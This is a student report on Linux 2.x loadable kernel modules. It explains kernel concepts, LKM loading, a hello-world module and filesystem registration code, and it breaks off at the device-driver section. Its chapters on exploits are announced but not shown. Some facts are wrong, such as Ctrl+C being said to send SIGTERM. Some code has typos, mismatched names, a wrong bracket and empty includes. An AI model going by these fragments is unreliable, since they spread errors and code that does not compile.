A Report on Kernel Loadable Module


By

Koushik Ghosh.


    Table of Content


    Chapter 1: Introduction

    1.1 Main Objective of The Work
    1.2 Previous work in This Field
    1.3 Unlike The previous Projects
    1.4 Expected Results
    1.5 Assumption And Environments

    Chapter 2: General Overview

    2.1 Overview of Kernel
    2.2 Introduction to Unix Kernel
    2.3 Switching to Linux
    2.4 Kernel Loadable Module

    Chapter 3: Design of the System

    3.1 Different Modularize approach in System Design
    3.2 File System
    3.3 Device Drivers
    3.4 System Calls
    3.5 Finding Exploit of Kernel loadable Module

    Chapter 4: System Implementations

    4.1 Kernel Loadable Module in System Enhancement
    4.1.1 File System Implementations
    4.1.2 Device Drivers
    4.1.3 New Systemcalls
    4.2 Kernel Module in Exploit
    4.2.1 Developing Exploits
    4.2.2 Linux Security Module Projects

    Chapter 5: Conclusion

    5.1 Advance Compatibilities
    5.2 Considerations
    5.3 Guidance
    5.4 Difficulties
    5.5 Future Scope of Developments

Introduction
    The access control mechanisms of existing mainstream operating systems are inadequate to provide strong system security. Since general-purpose operating systems must satisfy a wide range of user requirements, any access control mechanism integrated into such a system must be capable of supporting many different access control models, and lacks any direct support for enhanced access control mechanisms. However, Linux has long supported dynamically loadable kernel modules, primarily for device drivers, but also for other components such as filesystems. So loadable Kernel Module is essential for those system to bring extra compatibility comparing to other desktop and server operating systems available.


1.1 Main Objective of The Work
    Once a time it took 2 or 3 hours to install a new device in a Unix or Linux like system, because it used to need the Kernel Compilation for enabling that device. But now it become a story because now all Kernels are developing with modularized approach.
    A modular kernel reduces the working set size and allows new modules to be added later. Which is an easier way to add a new device driver when we buy that cool new hardware device: 1) copying a module file, or 2) patching your kernel, recompiling, and rebooting. There goes your precious uptime. Option 1 is easier for users and device manufacturers.
    So detailed study of Kernel Module is required as, for any Operating system Loadable Kernel Module approach is a way to success. And for Linux is the great example for this. Kernel Loadable Module expand the Linux world from Desktop systems to Enterprised Servers. Beside this system enhancement It has also have some security problems issues like designing exploits, writing viruses etc, which can leads to system crash or system hack.
    But it will be easy to fight with those problems if we can gather sound knowledge about it. My project is to explore the part of Kernel Module which are still unexplored. Here in my project I am trying to described some ideas to develop utilities as well as some exploits of LKMs and my goal is to explore the internals of Kernel Modules to protect our systems from this type of attack.


1.2 Previous work in This Field
    The Linux kernel is so flexible that It is really switchable from statically linked to dynamically linked and vice versa, because the source code is available. And user can compile it as module as well as no-module option.
    In March 2001, the National Security Agency (NSA) gave a presentation about Security-Enhanced Linux (SELinux) at the 2.5 Linux Kernel Summit. SELinux is an implementation of flexible and fine-grained nondiscretionary access controls in the Linux kernel, originally implemented as its own particular kernel patch.
    At present, the SELinux module hook function implementations do nothing. Module operations are controlled by the security policy by limiting the use of the CAP_SYS_MODULE capability via the selinux_capable hook function. If finer-grained controls are later determined to be worthwhile (e.g. controls based on the actual name or content of the module), then additional access controls could be implemented in these hook functions.
    A number of developers worked together to create a framework of kernel hooks that would allow many security models to work as loadable kernel modules.After wards the first portions of the LSM framework appeared in the 2.5.29 kernel release.
    Further kernel releases contained more portions of the LSM framework, and hopefully the entire patch is included in the 2.6.0 kernel release(which was incidently realeased just a few days back).


1.3 Unlike The previous Projects
    The LSM kernel patch provides a general kernel framework to support security modules. In particular the LSM framework is primarily focused on supporting access control modules, although future development is likely to address other security needs such as auditing. By itself, the framework does not provide any additional security; it merely provides the infrastructure to support security modules. The LSM kernel patch also moves most of the capabilities logic into an optional capabilities security module, with the system defaulting to a dummy security module that implements the traditional superuser logic.
    But it is a new running project which is continuously updating, unless and until it proves it's functionality totally, it is not preferable to put this in to the systems. More over it may need to install some new Kernel version into the system to make it secure, which is not only time taking but also quite difficult in the case of the enterprise servers.
    But as per I have explained the basics of Loadable Kernel Module associating with Kernel internals, it will be more easy to implement it in the older system as well as it will help us to know the tricky secrets of the kernel hacking. This will be easy for an administrator to protect his/her system with older and conventional tools rather than using a new experimenting one.


1.4 Expected Results
    This project includes a good explanation for kernel programmer. The documentation has basic section as well as the advance concepts. During my project I have spend more time to explore the exploit world of the loadable kernel module rather than to develop device drivers because device drivers are already implemented, but the abuses of loadable kernel modules are not so explored. The development of device drivers (both char and block driver) produce a remarkable result.
    Development of new systemcalls also become easy to implement in the existing system. And I have also left some scope to improve my new systemcall by maintaining the Linux standard approach.
    But when I got in to the exploit world, it become a hectic because after each implementation (not for all) rebooting the system become regular job. I have implement may exploits in various hacking field and got mentionable result. In this documentaion I have mention few prototype of it but they are only for educational purpose.


1.5 Assumption And Environments
    The whole documentation is based on a Linux 2.0.x , Linux 2.2.x and Linux 2.4.x machine (x86).Maximum programs and code fragments are tested on a Linux system (RedHat 7.1).
    The Linux system must have LKM support for using most code examples in this documentation. Most ideas in this text will also work on 2.2.x systems as well as 2.4.x systems (perhaps some minor modification are needed).As the kernel is concern , it is recomamnded to use the even-numbered kernel versions (ie. 2.2.x and 2.4.x) because thay are the stable ones.
    This programs and documentations does not depends on the distributions (Redhat, SuSE, Caldera, ...) if the kernel version is not changed. So this documentation covers version 2.0 through 2.4 of the kernel. All featues are concerned during coding, but it may be possible that some little uncompatibility arises then some minor modifications are needed.



General Overview

2.1 Overview of Kernel

    The core of the Operating System is called Kernel. It provides the main features as well as basic functionalities of the Operating System.
    Microkernel Opreating System demand a very small set of functions from the kernel, generally including a few synchronization primitives, a simple scheduler and an interprocess communication mechanism.
    Other system process run on the top of microkernel implementing other OS layer functions like memory allocators, device drivers, systemcall headers etc.
    In Monolithic kernel each layer of kernel is integrated in to the whole kernel program, and runs in kernel mode on behalf of the current process.
    Microkernels are generally slow than monolithic ones, since the explicit message passing between different different layers of the OS has a cost.
    But it has some theoritical advantages. This kernel supports modularize approach since any OS layer is independent. This type of kernel has better usage of RAM than the monolithic one.If the monolithic kernel is reigning champion, the microkernel is the up-and-coming challenger.

    The microkernel is more flexible because it does almost nothing. It basically provides just four minimal services -

    (i) interprocess communication mechanism,
    (ii) some memory management,
    (iii) limited amount of low-level process management and scheduling and
    (iv) low-level input/output.


    Unlike the monolithic kernel, it does not provide the file system, directory system, full process management, or much systemcall handeling. The services that the microkernel does provide are included because thay are difficult or expensive to provided anywhereelse.The goal is to keep it small.


2.2 Introduction to Unix Kernel

    The Unix Kernel is a example of monolithic kernel.It is large, complex ,and quite conventional. Each layer of kernel is integrated into the whole kernel program and runs in kernel mode on behalf of the current process. Traditional Unix kernel is compiled and statically linked .

    A CPU can run either in user mode or in kernel mode. Actually some CPU's can have more than two execution mode. For example the Intel CPUs can have four different execution states. Any standard Unix kernel can use only kernel mode and User mode.



    Modern Unix Operating Systems have the following components


    § Virtual Memory
    § Virtual File Systems
    § Light Weight Process
    § Reliable Signals
    § System V Release 4 -Inter Process Communication
    § Symmetric Multiprocessing


    NB : Unix variants only SVR4.2 Kernel Have Modularized feature.


    All Unix Kernel are Reentrant, this means that several process may be executing in Kernel Mode at the same time. Of course at uniprocessor system only one process can progress, but many of can be blocked in Kernel Mode and waiting for the CPU or completion of some I/O operation.

    One way to provide reentrancy is to write functions so that they modify only local variables and do not alter global data structures. Such functions are called reentrant functions.
    The kernel nat only include the reentrant functions but also non reentrant functions also. They use locking mechanisms so that only one function can execute a non reentrant function at a time.


    Kernel control path

    A process executing in user mode invokes a system call and the corresponding kernel control path varies the request cannot be satisfied immediately.

    Process Address Space


    Each process runs in private address space. A process running in user mode refers to private stack data and code areas. When running in Kernel Mode the process addresses the kernel data code area and makes use of another stack.

    The kernel is reentrant, so several Kernel Control path is refers to its own private kernel stack. Although it appears that each process has a private address space, but there may be required shared address space of that process to share it among many users.


    · Process can also share the parts of their address space as a kind of interprocess communication using the "shared memory" technique supported in Linux.


    Process Implementation

    The Kernel manage processes, each process is represented by a process description that includes the process states.

    · The program counter(PC) and stack pointer (SP) register.
    · The general-purpose registers.
    · The floating point registers.
    · The processor controls registers (Processor status word) containing information about the CPU.
    · The memory management register keep track of the RAM accessed by the process.

    Process

    Unix kernel makes a neat distinction between the process and the program it is executing. Fork() and exit() system calls are used respectively to create a new process and to terminate it, when exec()- like system call create a brand new address space containing the new program.
    The implementation of ' fork() ' would require to parents data and the parent's code to be duplicated and assign the copies to the child.This may be quite time consuming. That is why Linux kernel rely on hardware pagging units and on Copy-On -Write approach.


    Zombie Process

    The wait() system call allows a process to wait until one of its children terminates, it returns the process ID (PID) of the terminated children. When executing this system call, the kernel checks whether a child has already terminated. A special zombie process state is introduced to represent terminated processes.
    A special system process called init() that is created during system initialization. When a process terminates the kernel changes the appropriate process description pointers of all the existing children of the terminated process to make them become children of init. The init process routinely issues wait() system calls, whose side effect is to get rid of all zombies.


    Process groups and login sessions



    Each process description includes a process group ID field. Each group of processes may have a group leader, which is the process which PID coincides with the process group ID. A newly created process is initially inserted into the process group of its parent. Modern Unix Kernels also introduce login sessions. A login sessions contains all processes that descendants of the process that has started a working session on a specific terminal. A login sessions may have several process groups active simultaneously, one of these process groups is always in foreground, which means that it has access to the terminal. When a background process tries to access the terminal, it receives a SIGTTIN or SIGTTOUT signal.

    Synchronization and Critical Regions

    Reentrant kernel requires the use of synchronization, if a kernel control path is suspended while acting on kernel data structure, no other kernel control path is allowed to act on the same data structure unless it has been reset to a consistent state. When the outcome of some computation depends on how two or more processes are scheduled, the code is incorrect.This condition is called race condition.
    Safe access to a global variable is ensured by using atomic operation.
    Any section of code that should be finished by each process that begins it before another process can enter it is called critical region.
    Several Synchronization Techniques


    Non preemptive kernel

    In most traditional Unix are non preemptive, when a process executes in Kernel Mode, it cannot be arbitarily suspended and substuated with another process.
    In uniprocessor system all kernel data structures that are not updated by interrupts or exception handlers are safe for the kernel to access. It is not effective in multiprocessor systems. Since two kernel paths running on different CPUs could concurrently access the same data structure.
    Semaphore

    Widely used mechanism, effective in both uniprocessor and multiprocessor systems. A semaphore is simply a counter associated with a data structure, it is checked by all kernel threads before they try to access kernel data structure.
    Semaphore is an integer variable. A list of waiting processes
    Two atomic methods : down() and up()
    When a kernel control path wishes to access the data structure, it executes the down() method on the proper semaphore. If the value of the new semaphore is not negative, access to the data structure is granted otherwise rejected. When another process executes the up() method that semaphore, one of the process in the waiting list is allowed to proceed.

    Spin Lock

    In multiprocessor system semaphore is not the best solution to synchronization problem. Some kernel data structures should be protected from being concurrently accessed by kernel control paths that runs on the different CPUs.
    In these case, multiprocessor system uses "spin locks", it is similar to semaphore but it has no process list(waiting process list). When a process finds the lock closed by another process, it ' spins ' around repeatedly.
    It is useless in uniprocessor systems, when a kernel control path tries to access a locked data structure, it updating the protected data would not get any chance to end its execution, thus the systems hungs.

    Deadlocks

    Kernel control paths that synchronize with other control paths may easily enter into dead lock state. In Linux Kernel, there is a technique to avoid this problem by introducing a very little number of semaphore types and by requesting semaphores in an anceding order.
    Interrupt disabling

    Another synchronization mechanism for uniprocessor systems consists of disabling all hardware interrupts before entering a critical region and them right after leaving it.
    If the critical region is large, interrupts can remain disabled for a relatively long time, that easing all hardware activities to freeze. In multiprocessor system, the technique does not work at all. We cannot ensure that no other CPU can access the data structures updated in the protected critical region.
    Signals and Interprocess Communication


    Unix signals provide a mechanism for notifying process of system events. Each event has its own signal number.

    · Asynchronous notifications User can send interrupt signal SIGTERM to a foreground process by pressing (CTRL+C) at terminal.
    · Synchronous errors or exceptions Kernel sends SIGSEGV to a process when it accesses a memory location at an illegal address.


    Process may react to a signal reception in two ways

    · Ignore the signal.
    · Asynchronously execute a specified procedure (signal handler).
    Kernel perform a default action that depends on signal numbers

    · Terminate the process.
    · Write the execution content and the contents of the address space in a file (core dump) and terminate the process.
    · Ignore the signal.
    · Suspend the process.
    · Resume the process's execution if it is stopped.


    A few signals cannot be directly handled by the process and cannot be ignored, eg.' SIGKILL '.
    AT & T's Unix systems V introduce another kind of IPC among process in user mode which have been adapted by many Unix kernel - semaphores, message queues, and shared memory, they are all known as System V IPC.


    A process acquires a resource by invoking shmget(), semget() or msgget() system calls.Exchange of message can be done by using sgget(0 and msgsnd() system call, which insert the new message into a specific message queue.Shared memory provides the fastest way to process to exchange shared data, by issuing shmget() system call to create a new shared memory having a required size.shmat() system call to returns the starting address of the new region within the process address space. shmdt() to detach the shared memory from the process address space.

    Memory Management

    Memory management is the most complex activity in a Unix Kernel.

    Virtual Memory All recent Unix system provide a useful abstraction called virtual memory. It acts as a logical layer between the application memory requests and the hardware Memory management Unit (MMU).

    Advantages

    1. Several process can be execute concurrently.
    2. It is possible to run applications whose memory needs are larger then the available physical memory.
    3. Processes can execute a program whose code is only partially loaded in memory.
    4. Each process is allowed to access a subset o the available physical memory.
    5. Processes can share a single memory image of a library or program.
    6. Programs can be relocatable, that is, they can be placed anywhere in physical memory.
    7. Programmers can write machine-independent code, since they do not need to be concerned about physical memory organization.

    When a process uses a virtual address, the kernel and the MMU cooperate to locate the actual physical location of the requested memory items.
    Today's CPUs include hardware circuits that automatically translate the virtual addresses into physical ones. The available RAM is partitioned into page frames 4 or 8 kB in length and a set of page table is introduced to specify the correspondence between virtual and physical addresses.


2.3 Switching to Linux

    1. Multiprocessor Support.
    2. Kernel Threading.
    3. Multithread Application Support.
    4. Non preemptive Kernel.
    5. Dynamic linking Support.


    1. Multiprocessor Support : Several Linux Kernel takes advantages of multi-processor support. From Linux kernel 2.2.x release it supports SMP ( symmetric-Multi-Processing).Which means not only that system can use multiple processors but also any processor can handle any task, there is no discrimination among them.

    2.Kernel Threading : Context Switching between kernel threads are usually much less expensive then Context switching between two processes, since the former usually operate in a common address space.

    3. Multithread Application support : A multithread user application is set of many light weight process (LWP) or process that can be operated in a commonaddress space, common physical memory pages, common open files and so on.

    4. Non preemptive Kernel : In most traditional Unix are non-preemptive,when a process executes in Kernel Mode, it can not be arbitrarily suspended and substituted with other process .This means that Linux cannot arbitrarily interleave execution flows while they are in privileged mode. Several section of kernel code can run simultaneously with out being interrupted.

    5. Dynamic Linking support : Linux Kernel is totally dynamically linked ,we can load and unload some parts of the kernel code, which are called Modules. A module is an Object file whose code can be linked to and unlinked from the kernel at Runtime.

    The Object code usually consist of a set of functions that implements the File Systems, Device drivers ,or other features at the kernel's upper layer. The module does not run as an specific process .Instead it is executed in kernel mode on behalf of the current process like any other statically linked kernel functions.



2.4 Kernel Loadable Module

    Modules are kernel feature that effectively achieves many of the theoretical advantages of kernels without introducing performance penalties.A module is an object file whose code can be linked to (and unlinked from) the kernel at runtime.The object code usually consist of a set of functions that implements a file system , device drivers, or other features at the kernel's upper layer.The module does not run as an specific process .Instead it is executed in kernel mode on behalf of the current process like any other statically linked kernel functions.

    Kernel Loadable Module approach ( in GNU/Linux)

    Kernel loadable modules are also used in GNU/Linux systems ,there are certain type of object files which are linkable to Linux during runtime to expand it's functionality. As they can be loaded dynamically ;there must be no recompilation of kernel during installation or linking not only that but also they need no reboot of the system for using that Kernel Loadable Module (LKM).

    Terminology

    Kernel Loadable Modules are often called just kernel modules or just modules, but those are rather misleading terms because there are lots of kinds of modules in the world and various pieces built into the base kernel can easily be called modules. We use the term loadable kernel module or LKM for the particular kinds of modules.
    Some people think of LKMs as outside of the kernel. They speak of LKMs communicating with the kernel. This is a mistake; LKMs (when loaded) are very much part of the kernel. The correct term for the part of the kernel that is bound into the image that we boot, i.e. all of the kernel except the LKMs, is "base kernel." LKMs communicate with the base kernel. In some other operating systems, the equivalent of a Linux LKM is called a "kernel extension."

    History of Loadable Kernel Modules

    LKMs did not exist in Linux in the beginning. Anything we use an LKM for today was built into the base kernel at kernel build time instead. LKMs have been around at least since Linux 1.2 (1995).
    Device drivers and such were always quite modular. When LKMs were invented, only a small amount of work was needed on these modules to make them buildable as LKMs. However, it had to be done on each and every one, so it took some time. Since about 2000, virtually everything that makes sense as an LKM has at least had the option of being a major part of Kernel.

    Using the Kernel Modules

    We often have a choice between putting a module into the kernel by loading it as an LKM or binding it into the base kernel. LKMs have a lot of advantages over binding into the base kernel and they are recommend by every one.
    One advantage is that we don't have to rebuild our kernel as often. This saves the time and spares the possibility of introducing an error in rebuilding and reinstalling the base kernel. Once you have a working base kernel, it is good to leave it untouched as long as possible.
    Another advantage is that LKMs help us to diagnose system problems. A bug in a device driver which is bound into the kernel can stop the system from booting at all. And it can be really hard to tell which part of the base kernel caused the trouble. If the same device driver is an LKM, though, the base kernel is up and running before the device driver even gets loaded. If our system dies after the base kernel is up and running, it's an easy matter to track the problem down to the trouble-making device driver and just not load that device driver until we fix the problem.

    LKMs can save you memory, because we have to have them loaded only when we're actually using them. All parts of the base kernel stay loaded all the time. And in real storage, not just virtual storage.
    LKMs are much faster to maintain and debug. What would require a full reboot to do with a file system driver built into the kernel, we can do with a few quick commands with LKMs. We can try out different parameters or even change the code repeatedly in rapid succession, without waiting for a boot.
    Sometimes we have to build something into the base kernel instead of making it an module. Anything that is necessary to get the system up far enough to load kernel modules must obviously be built into the base kernel. For example, the driver for the disk drive that contains the root file system must be built into the base kernel.


    There is a tendency to think of LKMs like user space programs. They do share a lot of their properties, but LKMs are definitely not user space programs they are part of the kernel. As such, they have free run of the system and can easily crash it, they can manipulate any system call accroding to the user implementation .As hacking Linux becomes more interesting every day. One of the best technique to attack a Linux System in using Kernel code. Linux Kernel Module is the easiest way of it. It is possible to write code in running Kernel Space. Which allow us to access very sensitive parts of the OS.


Design of The System

    The Design part of the project contains a thorough analysis of the Kernel Loadable Module ,ie. their introduction to the system , their role in system enhancement,as well as this project contains information about KLM exploits ,that are now a days being used as system hacking tool. KLM is the theoretical introduction of the process of writing viruses in the Linux Systems. Here we have briefly discussed both side of it, and about the planning part and the designing part how I have combined two side in one project to explore the world of Kernel Loadable Modules.

    3.1 Different Modularize approach in System Design

    If we want to insert a code to a Linux, the most basic way to do that is to add some source files to the kernel source tree and recompile the kernel. In fact, the kernel configuration process consists mainly of choosing which files to include in the kernel to be compiled. But we can also add code to the Linux kernel while it is running. A chunk of code that you add in this way is called a loadable kernel module. These modules can do lots of things, but they typically are one of three things:

    · File System Implementations
    · Device Drivers
    · New System calls

    The kernel isolates certain functions, including these, especially well so they don't have to be intricately wired into the rest of the kernel. They are the functions used in in System Enhancement.(like ipchains ,iptables system call -for firewalling, and new device initialization like eepro100 network driver etc).

    3.2 Filesystem drivers in Modularized approach

    A file system driver interprets the contents of a file system (which is typically the contents of a disk drive) as files and directories and such. There are lots of different ways of storing files and directories and such on disk drives, on network servers, and in other ways. For each way, we need a filesystem driver. For example, there's a filesystem driver for the ext2,ext3 filesystem type used almost universally on Linux disk drives. There is one for the MS-DOS filesystem too, and one for NFS. We can load then in the running Linux by the LKM facility.
    3.3 Device drivers in Modularized approach

    A device driver is designed for a specific piece of hardware. The kernel uses it to communicate with that piece of hardware without having to know any details of how the hardware works. For example, there is a device driver for ATA disk drives. There is one for NE2000 compatible Ethernet cards. To use any device, the kernel must contain a device driver for it.There is a good use of Modules in developing Network drivers.
    A network driver interprets a network protocol. It feeds and consumes data streams at various layers of the kernel's networking function. For example, if we want an IPX link in our network, we would use the IPX driver.

    3.4 System calls implementation in Modularized approach

    User space programs use system calls to get services from the kernel. For example, there are system calls to read a file, to create a new process, and to shut down the system. Most system calls are integral to the system and very standard, so are always built into the base kernel (no LKM option). But we can invent a system call of our own and install it as an LKM. Or we can decide that we don't like the way Linux does something and override an existing system call with an LKM of our own.

    3.5 Finding Exploit of Kernel loadable Module

    It is quite impossible for any Administrator to protect any Servers from hackers if they are using the KLM as their hacking tool because their way of attack is really unpredictable . So we can say that Kernel Loadable Module is the most suitable portion of doing such abuses. So we have to know their way of doing so before we take any steps for securing our server. Here in my project I just described some idea and exploits of LKMs ,and I am trying to develop some utilities also to protect our servers from this type of attack.I think details analysis on KLM in developing exploits can enable us to predict the proper reason for any malfunctioning if it is introduced to the server by a KLM . More over knowledge on this will also enable us to give a remedy to such type of LKM exploit attack. For these we need to know how it works and how an exploits can be written.

System Implementations

    A LKM has main two functions which are used for every LKM for initialization in kernel memory and to remove it from kernel memory.
    
    int  init_module (void) /* used for a all initialization stuff */
    {
    .  .  .
    }
    
    void cleanup_module (void) /* used for a clean remove */
    {
    .  .  ..
    }
    

    Loading a module is normally restricted to root and managed by issuing the following command -

    #insmod modulename.o

    This command forces system to do the following things -

    · Load the object file.
    · Call the create module system call for relocation of memory.
    · Unresolved references are resolved by Kernel-Symbols with the system call "get_kernel_syms".
    · After this init_module system call is used for the LKM initialization module loads other functions of it in to the memory.




    Linking a module to the kernel

    An Example of Simple LKM

    This LKM has only used a print function to print some thing in the system log file as well as kernel log file.



    /* helloworld.c */
    #define MODULE
    #define __KERNEL__
    
    #include 
    #include 
    
    int init_module (void)
    {
    	printk ("<1> Hello World ……I am Loading…\n");
    	return 0;
    }
    
    void cleanup_module (void)
    {
    	printk("<1> Bye bye \n");
    }
    


    Here we have used printk("…") function at the place of printf("…") because kernel programming is totally different from User Space Programming.

    There are some restricted set of commands:

    #gcc -c -O3 hello world.c

    This will produce a Object code named "helloworld.o"

    We can install it to kernel memory by

    # insmod hello world.o

    We can see a list of Kernel Modules by issuing the following command

    # lsmod

    It will show as a table containing LKMs with some in formations. An example is given bellow.

    Module 		Pages 	Used by
    
    hello world		1		0


    What Does "lsmod" command do?

    This command reads the information from /proc/modules for showing which modules are loaded at the moment. `Pages' is the memory information ,how does many pages does the module fill.`Used by ' field tells us how often the module is used in the system ( reference count).

    The module can be removed ,when this counter is 'zero', after checking this, the command is

    # rmmod hello word




File system Implementation



    Each Unix like operating systems makes use of its own file system. Although all such filesystems comply with the POSIX interface ,each of them is implemented in a different way.

    The first version of Linux were based on the Minix filesystem. As Linux matured , the Extended Filesystem (Ext FS) was introduced ,it included several significant extensions but offered unsatisfactory performance [1]. The Second Extended Filesystem (Ext2) was introduced in 1994 ; it includes various new features as well as it is efficient and robust and has become the most used filesystem in Linux.

    The following features are included in the Linux file system


    (i) The internal representation of a file is given by an inode ,which contains a descriptor of the disk layout of the data and other information such as file owner, access permissions and access times.
    (ii) When creating the Filesystem the user can choose the file system block in to the hard drive( from 1024 to 4096) according to their requirements.
    (iii) When creating the file system user can also choose the maximum number of inode in a partition of a given size depending on the expected numbet of files to be stored on it.
    (iv) It can partitions disk blocks in to groups. Each group includes data blocks and inodes stored in adjacent tracks. It can minimizes the seek time.
    (v) The Filesystem preallocates disk data blocks to regular files before they are actually used.
    (vi) Fast symbolic links are supported.

    Although those features are included in the Filesystem , but it has a problem that in the event of an abnormal shutdown, system suffers from file lost and poor recovery techniques. To remove this problem Ext 3 Filesystem comes with Journaling feature.There is another type of Filesystem Raiser FS which is very much consistent to abnormal system halt. Similarly IBM's new Filesystem is JFS which is consistent as well as can handle very large block size. But one can say it how can user load a new file system in a existing kernel. The answer is it can be done through Kernel Loadable modules. The file system driver are build up in a modularize approach,which provide the conventional system calls like open , read, write, dup etc as well as it can be patched in to a running kernel.
    Filesystem development and improvement become easy to implement in the kernel,which was a hectic job before this modularize approach come in to, because then Kernel compilation was mandatory for any kind of change in the kernel. Modularize approach in Filesystem implementation removes this problem.
    In order to support multiple file systems, Linux contains a special kernel interface level called VFS (virtual File System Switching). This is similar to the vnode/vfs interface found in SVR4 derivatives (originally it came from BSD and Sun original implementations).


    A File System has the following structure



    Boot block It occupies the begging of a file system, typically the first sector, and may contain the bootstrap code that is read into the machine to boot or initialize , the operating system.

    Super Block It describes the state of a Filesystem - how large ,huge ,and how many files it can stored, information of free space and many other information.

    Inode List It described as a list of inodes that follows the super block in the file sytem.The kernel references inodes by index in to the inode list.


    A view of inode structure.


      The Data Block It start at the end of the inode list and contain file data and administrative data. An allocated data block can belong to one and only one file in file system.


      Linux inode cache is implemented in a single file. (fs/inode.c) which has a following structure.



      A global Hash Table It is the inode Hash table where each inode is hashed by the value of the superblock pointer and 32bit inode number.

      A global type in in_use It enlist (inode_in_use) which contains valid inodes with i_count > 0 and i_nlink >0 .

      A global type unused It is enlist (inode_unused), which contains valid inodes with i_count = 0.

      A per-superblock type dirty list It is used as 'sb->s_dirty' which contains valid inodes with i_count>0 ,i_nlink>0 and i_state & I_DIRTY.

      Inode cache proper (inode_cachep) A SLAB cache called inode_cachep.As inode objects are allocated and freed , they are taken from and returned to this SLAB cache.The inode list are represented by inode->i_list, the hashable from inode->i_hash.Each inode can be on a hash table and the inode lists are protected by a single spinlock (ie. inode_lock)

      The inode cache subsystem is initialize when inode_init() function is called from the init/main.c (ie. start_kernel()) function (which is marked as __init). It means its code is thrown away later on.



    Filesystem Registration and Unregistration through modules This provides Linux a easy mechanism for new filesystem to be written with minimum efforts.It is the VFS interface which is implemented in all Linux filesystem as modules.Let us consider the steps required to implement a filesystem in Linux.The code to implement a filesystem can be either a dynamically loadable module or a statically linked in the Kernel.But here we choose the first one. All that needed is to fill in a struct file_system_type structure and register it with the VFS using the register_filesystem() function as in the following example.



    	#include "linux/modules.h"
    	#include "linux/init.h"
    
    	static struct super_block *kfs_read_super(struct super_block *,void *, int);
    	static DECLARE_FSTYPE_DEV(kfs_fs_ytpe,"kfs", kfs_read_super);
    	static int __init_kfs_fs(void)	
    	{
    		return register_filesystem(&kfs_fs_type);
    	}
    	static void __exit exit_kfs_fs(void)
    	{
    		unregister_filesystem(&kfs_fs_type);
    	}
    	module_init(init_kfs_fs)
    	module_exit(exit_kfs_fs)
    


    The module_init() and module_exit() macros ensure that, when KFS is compiled as a module, the functions init_kfs_fs() and exit_kfs_fs() turn into init_module() and cleanup_module() respectively; if KFS is statically linked in to the kernel, the exit_kfs_fs(0 code vanishes as it is unnecessary.



    The structure file_system_type is described as follows :

    	
    	struct file_system_type {
    		const char *name;
    		int fs_flag;
    		super_block *(*read_super)(struct super_block*,void *,int);
    		struct module *owner;
    		struct vfsmount kern_mnt; /* For kernel mount */
    		struct file_system_type *next;
    	};
    
    The fields are explained here

    name
    Human readable name, used in as a key to find a file in a file system by its name;this name is used for the filesystem in type mount but it should be unique.

    fs_flag
    One or more(Ored) of the flag : FS_REQUIRED_DEV for the filesystem that can only be mounted on a block device, FS_SINGLE for filesystem that can have only one superblock .

    read_super
    A pointer to the function that reads the superblock during mount operation.

    owner
    This is a pointer to the module that implements this filesystem. If the filesystem is statically linked in to the kernel then it is set to be null.

    kern_mnt
    It is for FS_SINGLE Filesystem only.This is set by kern_mount().

    next
    It is the linkage into singly-linked list headed by file_system.The list is protected by the file_systems_lock read-write spinlock and function register/unregister_filesystem() modify it by linking and unlinking the entry from the list.

    The File table structure is given bellow

    
    struct files_struct {
    	atomic_t count;
    rwlock_t file_lock;
    int max_fds;
    int man_fdset;
    int next_fd;
    struct file **fd;	 /* current fd array */
    fd_set *close_on_exec;
    fd_set *open_fds;
    fd_set close_on_exec_init;
    
    fd_set  open_fds_init;
    struct file *fd_arraay[NR_OPEN_DEFAULT);
    	};
    


    The file->count is a reference count, increamented by get_file() and decreamented by fput() and by put_flip().



    The tsk->files can be shared between parent and child if the child thread was created by using clone() systemcall with CLONE_FILES set in the clone flages argument.



    When a file is opend, the file structure allocated for it is installed into

    current->files->fd[fd] slot and a fdbit is set in the bitmap
    current->files->open_fds.All this is done under the write protection of
    current->files->file_lock read write spinlock. When the descriptor is closed a When the descriptor is closed a fd bit is cleared in
    current->files->open_fds and current->files->next_fd is set equal to fd as a hint for finding the first unused descriptor next time this process wants to open a file.


    The File Structure Management
    struct  fown_struct {
    	int pid; 		/* pid or -pgrp where SIGIO should be sent 	*/
    	uid_t uid,euid;	/* uid or euid of process setting the owner 	*/
    	int signum;		/* posix1.b rt signal to be delivered on IO	*/
    };
    
    struct file {
    	struct  list_head	 f_list;
    	struct  dentry		*f_dentry;
    	struct	vfsmount	*f_vfsmnt;
    	struct	file_operation *f_op;
    	atomic_t		 f_count;
    	unsigned int		f_flags;
    	mode_t		f_mode;
    	loff_t			f_pos;
    	unsigned long	f_reada, f_ramax, f_raend, f_ralen, f_rawin;
    	struct fown_struct	f_owner;
    	unsigned int 		f_uid, f_gid;
    	int			f_error;
    	unsigned long	f_version;
    /*	needed for tty driver , and may be for others	*/
    	void			*private_data;
    };
    



    Now we can described each and every elements of the structure briefly like as follows -


      f_list : this field links the file structure on one ( and only one) of the list;
      a) sb->s_files list of all open files on this file system, if the corresponding inode is not anonymous, then dentry_open() (Called by flip_open()) links the file in to this list.
      b) fs/ file_table.c : free_list, containing unused file structures ;
      c) fs/ file_table.c : annon_list, when a new file structure is created by get_empty_flip(), it is placed on this list. All these list are protected by the files_lock spinlock.


      f_dentry : the dentry corresponding to this file. The dentry is created at namei data lookup time by open_name() (or rather path_walk() which it calls) but the actual file->f_dentry field is set by dentry_open() to contain the dentry thus found.

      f_vfsmnt : the pointer to vfsmount structure of the filesystem containing the file. This is set by dentry_open() but is found as part of nameidata lookup by open_namei()(or rather path_init() which it calls).

      f_count : reference count manipulate by get_file/fput_flip/fput.

      f_flags : O_XXX flag from open (2) system call copied their (with slid modifications by flip_open() ) by dentry_open() and after clearing O_CREAT, O_EXCL, O_NOCTTY, O_TRUNC.

      f_mode : A combination of userspace flags and mode, set by dentry_open(). The point of the conversion is to store read and write access in seperate bits so one could do easy checks like (f_mode, and FMODE_WRITE) and (f_mode & FMODE_READ).

      f_pos : A current file position for next read or write to the file. Under i386 it is of type long long a 64bit value.

      f_reada, f_ramax, f_raend, f_ralen, f_rawin : It is used to support readahead.

      f_owner : Owner of file I/O to recieve asynchronous I/O notifications via SIGIO mechanism.

      f_uid, f_gid : It is used to set to user id and group id of the process, that open the file.

      f_error : It is used by NFS client to return write errors.

      f_version : It is used to versioning mechanism for invalidating caches.


    The interface for filesystem writers had to be very simple so that people could try to reverse engineer existing proprietary filesystem by writing read only versions of them. Therefore Linux Modularize Filesystem driver makes it easy to implement read only filesystem. In the world where people still use non-Linux operating systems to protect their investment in legacy software, Linux had to provide interoperability by supporting a great multitude of different filesystems most of which would not deserve to exist on their own but only for compatibility with existing non-Linux operating system.



4.1.2 Device Drivers Implementations




